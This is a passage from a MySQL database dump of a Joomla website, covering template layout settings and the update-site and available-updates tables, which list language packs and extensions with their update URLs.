0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"4\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user-bottom1\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"4\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user-bottom2\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"4\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"user-bottom3\",\"style\":\"sp_xhtml\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Main Bottom\",\"class\":\"\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"12\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"mainbottom\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Bottom\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom1\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom2\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom3\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"3\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"bottom4\",\"style\":\"sp_flat\",\"customclass\":\"\",\"responsiveclass\":\"\"}]},{\"name\":\"Footer\",\"class\":\"container\",\"responsive\":\"\",\"backgroundcolor\":\"rgba(255, 255, 255, 0)\",\"textcolor\":\"rgba(255, 255, 255, 0)\",\"linkcolor\":\"rgba(255, 255, 255, 0)\",\"linkhovercolor\":\"rgba(255, 255, 255, 0)\",\"margin\":\"\",\"padding\":\"\",\"children\":[{\"span\":\"6\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"footer1\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"},{\"span\":\"6\",\"offset\":\"\",\"type\":\"modules\",\"position\":\"footer2\",\"style\":\"none\",\"customclass\":\"\",\"responsiveclass\":\"\"}]}],\"menu\":\"mainmenu\",\"menutype\":\"mega\",\"menu_col_width\":\"200\",\"show_menu_image\":\"1\",\"menu_image_position\":\"1\",\"submenu_position\":\"0\",\"init_x\":\"0\",\"init_y\":\"24\",\"sub_x\":\"0\",\"sub_y\":\"0\",\"body_font\":\"arial\",\"body_selectors\":\"body, p\",\"header_font\":\"Arial:400,600,700,800\",\"header_selectors\":\"h1, h2, h3, h4, h5, h6\",\"other_font\":\"\",\"other_selectors\":\"\",\"cache_time\":\"60\",\"compress_css\":\"0\",\"compress_js\":\"0\",\"enable_ga\":\"0\",\"ga_code\":\"\",\"loadjquery\":\"0\",\"loadfromcdn\":\"1\",\"lessoption\":\"1\",\"hide_component_area\":\"0\"}');
/*!40000 ALTER TABLE `xyhmu_template_styles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_update_categories`
--

DROP TABLE IF EXISTS `xyhmu_update_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_update_categories` (
  `categoryid` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(20) DEFAULT '',
  `description` text NOT NULL,
  `parent` int(11) DEFAULT '0',
  `updatesite` int(11) DEFAULT '0',
  PRIMARY KEY (`categoryid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Update Categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_update_categories`
--

LOCK TABLES `xyhmu_update_categories` WRITE;
/*!40000 ALTER TABLE `xyhmu_update_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `xyhmu_update_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_update_sites`
--

DROP TABLE IF EXISTS `xyhmu_update_sites`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_update_sites` (
  `update_site_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) DEFAULT '',
  `type` varchar(20) DEFAULT '',
  `location` text NOT NULL,
  `enabled` int(11) DEFAULT '0',
  `last_check_timestamp` bigint(20) DEFAULT '0',
  PRIMARY KEY (`update_site_id`)
) ENGINE=MyISAM AUTO_INCREMENT=17 DEFAULT CHARSET=utf8 COMMENT='Update Sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_update_sites`
--

LOCK TABLES `xyhmu_update_sites` WRITE;
/*!40000 ALTER TABLE `xyhmu_update_sites` DISABLE KEYS */;
INSERT INTO `xyhmu_update_sites` VALUES (1,'Joomla Core','collection','http://update.joomla.org/core/list.xml',0,1433708360),(2,'Joomla Extension Directory','collection','http://update.joomla.org/jed/list.xml',0,1433708360),(3,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist.xml',0,1433708360),(4,'System - Helix Framework','plugin','http://joomshaper.com/updates/plg_system_helix.xml',1,0),(5,'System - Helix Framework','extension','http://www.joomshaper.com/updates/plg_system_helix.xml',0,1426598209),(6,'K2 Updates','extension','http://getk2.org/update.xml',0,1479242234),(7,'J2XML Updates','extension','http://www.eshiol.it/updates/packages/j2xml-updates?format=xml&dummy=extension.xml',0,1397113920),(8,'J2XML Importer 1.5 Updates','extension','http://www.eshiol.it/updates/plugins/j2xml-importer-15-updates?format=xml&dummy=extension.xml',0,1397113922),(9,'Facebook Like Updates','extension','http://update.kmweb.dk/xml/facebooklike.xml',0,1472732824),(10,'Simple Image Gallery','extension','http://www.joomlaworks.net/updates/jw_sig.xml',0,1479242234),(11,'','collection','http://update.joomlart.com/service/tracking/list.xml',0,1479242234),(12,'GTranslate','extension','http://gtranslate.net/downloads/gtranslate.xml',0,1479242234),(13,'Mobile Updates','extension','http://www.mobilejoomla.com/updates/com_mobilejoomla.2.xml',1,0);
/*!40000 ALTER TABLE `xyhmu_update_sites` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_update_sites_extensions`
--

DROP TABLE IF EXISTS `xyhmu_update_sites_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_update_sites_extensions` (
  `update_site_id` int(11) NOT NULL DEFAULT '0',
  `extension_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`update_site_id`,`extension_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Links extensions to update sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_update_sites_extensions`
--

LOCK TABLES `xyhmu_update_sites_extensions` WRITE;
/*!40000 ALTER TABLE `xyhmu_update_sites_extensions` DISABLE KEYS */;
INSERT INTO `xyhmu_update_sites_extensions` VALUES (1,700),(2,700),(3,600),(3,10079),(4,10000),(5,10000),(6,10048),(7,10075),(8,10076),(9,10082),(10,10085),(11,10090),(12,10091),(13,10092);
/*!40000 ALTER TABLE `xyhmu_update_sites_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `xyhmu_updates`
--

DROP TABLE IF EXISTS `xyhmu_updates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `xyhmu_updates` (
  `update_id` int(11) NOT NULL AUTO_INCREMENT,
  `update_site_id` int(11) DEFAULT '0',
  `extension_id` int(11) DEFAULT '0',
  `categoryid` int(11) DEFAULT '0',
  `name` varchar(100) DEFAULT '',
  `description` text NOT NULL,
  `element` varchar(100) DEFAULT '',
  `type` varchar(20) DEFAULT '',
  `folder` varchar(20) DEFAULT '',
  `client_id` tinyint(3) DEFAULT '0',
  `version` varchar(10) DEFAULT '',
  `data` text NOT NULL,
  `detailsurl` text NOT NULL,
  `infourl` text NOT NULL,
  PRIMARY KEY (`update_id`)
) ENGINE=MyISAM AUTO_INCREMENT=4052 DEFAULT CHARSET=utf8 COMMENT='Available Updates';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `xyhmu_updates`
--

LOCK TABLES `xyhmu_updates` WRITE;
/*!40000 ALTER TABLE `xyhmu_updates` DISABLE KEYS */;
INSERT INTO `xyhmu_updates` VALUES (1,3,0,0,'Armenian','','pkg_hy-AM','package','',0,'2.5.8.1','','http://update.joomla.org/language/details/hy-AM_details.xml',''),(2,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(3,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(4,3,0,0,'Khmer','','pkg_km-KH','package','',0,'2.5.7.1','','http://update.joomla.org/language/details/km-KH_details.xml',''),(5,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.10.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(6,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.8.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(7,3,0,0,'Bulgarian','','pkg_bg-BG','package','',0,'2.5.7.1','','http://update.joomla.org/language/details/bg-BG_details.xml',''),(8,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(9,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(10,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(11,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(12,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(13,3,0,0,'Ukrainian','','pkg_uk-UA','package','',0,'2.5.13.11','','http://update.joomla.org/language/details/uk-UA_details.xml',''),(14,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.14.2','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(15,3,0,0,'Belarusian','','pkg_be-BY','package','',0,'2.5.8.1','','http://update.joomla.org/language/details/be-BY_details.xml',''),(16,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(17,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.7.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(18,3,0,0,'Romanian','','pkg_ro-RO','package','',0,'2.5.11.1','','http://update.joomla.org/language/details/ro-RO_details.xml',''),(19,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(20,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(21,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(22,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(23,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(24,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(25,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.11.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(26,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.10.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(27,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.10.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(28,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(29,3,0,0,'Lithuanian','','pkg_lt-LT','package','',0,'2.5.7.1','','http://update.joomla.org/language/details/lt-LT_details.xml',''),(30,3,0,0,'Albanian','','pkg_sq-AL','package','',0,'2.5.1.5','','http://update.joomla.org/language/details/sq-AL_details.xml',''),(31,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(32,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(33,3,0,0,'Galician','','pkg_gl-ES','package','',0,'2.5.7.4','','http://update.joomla.org/language/details/gl-ES_details.xml',''),(34,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(35,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.10.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(36,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.8.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(37,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(38,3,0,0,'Hebrew','','pkg_he-IL','package','',0,'2.5.7.1','','http://update.joomla.org/language/details/he-IL_details.xml',''),(39,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(40,3,0,0,'Laotian','','pkg_lo-LA','package','',0,'2.5.6.1','','http://update.joomla.org/language/details/lo-LA_details.xml',''),(41,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(42,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(43,3,0,0,'Greek','','pkg_el-GR','package','',0,'2.5.6.1','','http://update.joomla.org/language/details/el-GR_details.xml',''),(44,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.6.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(45,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(46,3,0,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'2.5.9.1','','http://update.joomla.org/language/details/pt-BR_details.xml',''),(47,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(48,3,0,0,'Vietnamese','','pkg_vi-VN','package','',0,'2.5.8.1','','http://update.joomla.org/language/details/vi-VN_details.xml',''),(49,3,0,0,'Kurdish Sorani','','pkg_ckb-IQ','package','',0,'2.5.9.1','','http://update.joomla.org/language/details/ckb-IQ_details.xml',''),(50,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.11.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(51,3,0,0,'Croatian','','pkg_hr-HR','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/hr-HR_details.xml',''),(52,3,0,0,'Azeri','','pkg_az-AZ','package','',0,'2.5.7.1','','http://update.joomla.org/language/details/az-AZ_details.xml',''),(53,3,0,0,'Norwegian Nynorsk','','pkg_nn-NO','package','',0,'2.5.8.1','','http://update.joomla.org/language/details/nn-NO_details.xml',''),(54,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.14.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(55,3,0,0,'Scottish Gaelic','','pkg_gd-GB','package','',0,'2.5.7.1','','http://update.joomla.org/language/details/gd-GB_details.xml',''),(56,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.13.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(57,3,0,0,'Basque','','pkg_eu-ES','package','',0,'1.7.0.1','','http://update.joomla.org/language/details/eu-ES_details.xml',''),(58,3,0,0,'Uyghur','','pkg_ug-CN','package','',0,'2.5.7.2','','http://update.joomla.org/language/details/ug-CN_details.xml',''),(59,3,0,0,'Korean','','pkg_ko-KR','package','',0,'2.5.11.1','','http://update.joomla.org/language/details/ko-KR_details.xml',''),(60,3,0,0,'Hindi','','pkg_hi-IN','package','',0,'2.5.6.1','','http://update.joomla.org/language/details/hi-IN_details.xml',''),(61,3,0,0,'Welsh','','pkg_cy-GB','package','',0,'2.5.6.1','','http://update.joomla.org/language/details/cy-GB_details.xml',''),(62,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(63,1,700,0,'Joomla','','joomla','file','',0,'2.5.19','','http://update.joomla.org/core/extension.xml',''),(64,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(65,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(66,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(67,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(68,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(69,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(70,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(71,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(72,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(73,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(74,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(75,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(76,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(77,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(78,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(79,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(80,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(81,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(82,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(83,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(84,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(85,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(86,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(87,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(88,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(89,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(90,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(91,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(92,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(93,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(94,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(95,3,0,0,'Bengali','','pkg_bn-BD','package','',0,'2.5.0.1','','http://update.joomla.org/language/details/bn-BD_details.xml',''),(96,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(97,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(98,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(99,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(100,5,10000,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.4','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(101,6,10048,0,'K2','K2, the powerful content extension for Joomla! (by JoomlaWorks)','com_k2','component','',1,'2.6.8','','http://getk2.org/update.xml',''),(102,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(103,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(104,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(105,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(106,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(107,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(108,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(109,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(110,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(111,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(112,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(113,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(114,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(115,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(116,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(117,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(118,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(119,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(120,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(121,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(122,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(123,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(124,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(125,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(126,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(127,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(128,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(129,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.17.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(130,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(131,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(132,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(133,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(134,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(135,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(136,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(137,9,0,0,'Facebook Like','','mod_facebooklike','module','',1,'1.4.9.1','','http://update.kmweb.dk/xml/facebooklike.xml','http://martinkolle.github.com/Facebook-Like-Button'),(138,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(139,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(140,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(141,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(142,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(143,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(144,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(145,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(146,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(147,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(148,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(149,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(150,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(151,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(152,3,0,0,'Arabic 